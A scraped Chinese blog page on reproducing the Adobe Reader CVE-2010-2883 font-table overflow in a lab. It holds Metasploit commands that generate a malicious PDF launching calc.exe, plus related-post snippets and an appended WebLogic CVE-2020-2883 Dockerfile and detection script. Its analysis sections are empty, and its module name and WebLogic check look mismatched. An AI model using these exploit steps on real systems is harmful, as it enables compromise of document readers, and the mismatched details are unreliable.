CVE-2010-2883

最新推荐文章于 2024-11-29 08:14:07 发布
原创 最新推荐文章于 2024-11-29 08:14:07 发布 · 484 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一个针对Adobe Reader 9.3.0版本的PDF漏洞利用过程,包括环境搭建步骤、所需工具及软件配置,通过IDA进行静态分析,并使用OD进行动态调试,最终实现在目标系统上弹出calc.exe。


一 环境准备

 1  POC的准备

   我们需要在被攻击的机器上面弹出calc.exe

  

use exploit/windows/fileformat/adobe_utilprintf
set FILENAME malicious.pdf
set PAYLOAD windows/exec
set CMD calc.exe
show options
exploit

2  Adober的准备

  AdbeRdr930_zh_CN.exe


3  PDFStreamDumper准备 

  PDFStreamDumper_Setup.exe,用于提取SING表。


4  IDA


5 OD


二  IDA 静态分析




三 OD动态调试



四 总结 











[漏洞战争]漏洞复现:CVE-2010-2883Adobe Reader TTF字体SING表栈溢出漏洞
m0_51246873的博客
01-12 1147
[漏洞战争]漏洞复现:CVE-2010-2883Adobe Reader TTF字体SING表栈溢出漏洞
Adobe Reader 缓冲区溢出漏洞 (CVE-2010-2883)漏洞分析报告
m0_64973256的博客
01-20 1077
.简介 软件名称:Adobe Reader 影响范围:7.0.0-9.3.4版本 影响平台:Windows 漏洞模块:CoolType.dll 威胁等级:高危 漏洞类型:缓冲区溢出 威胁路径:远程 机密性影响:完全的信息泄露导致所有系统文件暴露 完整性影响:系统完整性可被完全破坏 可用性影响:可能导致系统完全宕机 攻击复杂度:漏洞利用存在一定的访问条件 攻击向量:攻击者不需要获取内网访问权或本地访问权 身份认证:漏洞利用无需身份认证 二.软件介绍 Adobe Rea...
CVE-2010-2883字体文件SING表栈溢出
07-03
CVE-2010-2883字体文件SING表栈溢出,CVE-2010-2883字体文件SING表栈溢出
CVE-2010-2883分析
weixin_41487541的博客
03-20 5061
一、漏洞描述 Adobe Reader 和 Acrobat 9.x 9.4 之前的 CoolType.dll 中基于堆栈的缓冲区溢出,以及 Windows 和 Mac OS X 8.2.5 之前的 8.x,允许远程攻击者执行任意代码或导致拒绝服务(应用程序崩溃)通过在 TTF 字体的 Smart INdependent Glyphlets (SING) 表中具有长字段的 PDF 文档。用户受骗打开了特制的PDF文件就有可能导致执行任意代码。 二、漏洞复现 实验环境:Windows XP SP3虚拟机、
Adobe Reader 缓冲区溢出漏洞 (CVE-2010-2883)漏洞分析报告
君子谬
11-28 2289
. 简介   软件名称:Adobe Reader 影响范围:7.0.0-9.3.4版本 影响平台:Windows 漏洞模块:CoolType.dll 威胁等级:高危 漏洞类型:缓冲区溢出 威胁路径:远程 机密性影响:完全的信息泄露导致所有系统文件暴露 完整性影响:系统完整性可被完全破坏 可用性影响:可能导致系统完全宕机 攻击复杂度:漏洞利用存在一定的访问条件 攻击向量:
漏洞复现-CVE-2010-2883
滕财然的博客
02-26 1737
CVE-2010-2883 Adobe Reader复现 1、漏洞原理 Adobe Reader 8.24-9.3.4的CoolType.dll库在解析字体文件SING表格中的uniqueName项时存在栈溢出漏洞,用户打开了特制的PDF文件可能导致执行恶意代码,可实现比如进行远程控制等。 2、漏洞分析 反汇编工具IDA: IDA 是全球最智能、功能最完善的交互式反汇编程序,许多软件安全专家和黑客...
CVE-2010-2883 从漏洞分析到样本分析
qq_28205153的博客
08-19 6254
本文章将从漏洞利用分析开始,到样本分析结束,其中涉及到的知识点有PDF格式、TTF字体格式、缓冲区溢出漏洞利用、PE文件格式、软件脱壳和恶意代码分析。其中会演示一些基本操作,方便初学者进行复现。 前置知识 要学习本文章,需要下面的前置知识 C语言。可以看《C程序设计语言》。 汇编语言。可以看《深入理解计算机系统》第三章。 缓冲区溢出漏洞利用。可以看《0day安全:软件漏洞分析技术》。 软件脱壳、PE文件格式。可以看《加密与解密》。 恶意代码分析(可选)。可以看《恶意代码分析实战》。 漏洞信息 漏洞名称:
CVE-2010-2883 Luckycat
domosteven的博客
11-29 1232
掌握CVE-2010-2883 luckycat漏洞原理以及基本方法。
CVE-2010-2883:基于样本分析 PDF SING表字符溢出漏洞
CuiXY's Blog
02-01 418
0x01
栈溢出CVE复现分析(CVE-2010-2883
weixin_40306105的博客
05-03 1054
1 实验环境 操作系统:XP SP3 调试器:OllyDbg 反汇编:IDA Pro 7.0 Adobe Reader : 9.3.4 2 漏洞背景 CVE-2010-2883是Adobe Reader和Acrobat中的CoolType.dll库在解析字体文件SING表中的uniqueName项时存在栈溢出漏洞。 3 实验内容 首先在系统中找到问题库文件,也就是xp sp3...
CVE-2010-2883】进行钓鱼攻击的研究
Mr_Fmnwon的博客
04-10 388
最近作业中研究APT攻击,了解到2011年前后披露的LURID-APT,其中敌手利用了各种版本的文件查看器的漏洞实现攻击。CVE-2010-2883就是其中被利用的一个adobe reader的漏洞。Adobe Reader 8.24-9.3.4的CoolType.dll库在解析字体文件SING表格中的uniqueName项时存在栈溢出漏洞,用户打开了特制的PDF文件可能导致执行恶意代码,可实现比如进行远程控制等。输入exploit进行攻击利用,此时在某目录下生成用于攻击的携带木马的pdf文件。
CVE-2010-2883漏洞分析
weixin_46286477的博客
09-28 1238
CVE-2010-2883漏洞分析,从基础开始学习漏洞。
Luckcat攻击事件样本分析(利用cve-2010-2883)
Z_LiT0的博客
08-23 700
0x00 运行样本分析行为 首先开启process monitor 监控,然后在打开样本文件: 监控到cmd在temp目录下新建了svrhost.exe文件和_uninsep.bat文件。 使用process expoler 发现病毒文件篡改了spoolsv.exe文件植入了恶意dll。 首先去看下_uninsep.dat文件是什么: 发现是一个自删除文件,执行完代码删除te...
CVE-2010-2883 PDF漏洞提权
EC_Carrot的博客
03-08 374
漏洞背景 CVE-2010-2883是Adobe Reader和Acrobat中的CoolType.dll库在解析字体文件SING表中的uniqueName项时存在的栈溢出漏洞,当用户打开特制的恶意PDF文件时,可允许任意代码远程执行。 这个漏洞也比较老了,相信很多机子都不装Adobe Reader低版本了,但对于萌新来说,还是先从旧漏洞开始复现会比较合适 影响版本 Adobe Reader 8.2.4 - 9.3.4 漏洞利用 Metasploit工具已经将相关的漏洞利用代码集成进来了,通过简单的步骤
CVE-2010-2883 Adobe Reader TTF字体SING表栈溢出漏洞分析
xiaoeryu_的博客
03-18 1053
CVE-2010-2883 Adobe Reader TTF字体SING表栈溢出漏洞0x1:漏洞描述0x2:分析环境0x3:基于字符串定位的漏洞分析方法0x4:样本Exploit技术分析0x05:动态调试 0x1:漏洞描述 ​ CVE-2010-2883是Adobe Reader和Acrobat中的CoolType.dll库在解析字体文件SING表中的uniqueName项时存在的栈溢出漏洞,用户受骗打开了特制的PDF文件就有可能导致执行任意代码。 0x2:分析环境 推荐使用的环境 备注
vulhub CVE-2020-2883
最新发布
03-18
### 关于 CVE-2020-2883 的 VulHub 配置 目前在官方的 VulHub 项目中并未提供针对 Oracle WebLogic Server CVE-2020-2883 漏洞的具体配置文件[^5]。然而,可以手动创建相应的 Dockerfile 和配置文件来模拟该漏洞环境。 以下是基于已知信息的手动搭建方法: #### 手动构建 CVE-2020-2883 复现环境 1. **克隆 VulHub 仓库** 如果尚未安装 VulHub,请先通过以下命令获取其源码: ```bash git clone https://github.com/vulhub/vulhub.git ``` 2. **准备目标版本的 WebLogic** CVE-2020-2883 影响的是 Oracle WebLogic Server 版本 10.3.6.0.0 至 12.2.1.4.0。因此需要下载受影响的目标版本并将其放置到适当路径下。 3. **编写自定义 Dockerfile** 创建一个新的目录用于存储此漏洞的相关文件,并编辑 `Dockerfile` 文件如下所示: ```dockerfile FROM oraclelinux:7-slim RUN yum install -y unzip wget && \ mkdir /weblogic && \ cd /weblogic && \ wget http://example.com/path_to_weblogic.zip && \ # 替换为目标版本的实际链接 unzip weblogic.zip && \ rm -f weblogic.zip EXPOSE 7001 CMD ["java", "-jar", "/weblogic/startWebLogic.sh"] ``` 4. **启动容器服务** 使用 Docker Compose 或者单独运行上述镜像即可完成部署工作。 5. **验证漏洞存在性** 利用公开 POC 测试工具确认是否存在未授权访问或其他安全风险行为。 注意:以上过程仅为学习研究用途,在未经授权情况下不得对任何真实系统实施攻击测试操作。 ```python import requests url = 'http://target_ip:port/wls-wsat/CoordinatorPortType' headers = {'content-type': 'text/xml'} body = """<?xml version="1.0" encoding="UTF-8"?> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"> <soapenv:Header> <wsse:Security soapenv:mustUnderstand="true" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd"/> </soapenv:Header> </soapenv:Envelope>""" response = requests.post(url, data=body, headers=headers) if response.status_code == 200 and '<faultcode>' not in response.text: print('可能存在 CVE-2020-2883 漏洞') else: print('暂无发现明显异常') ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值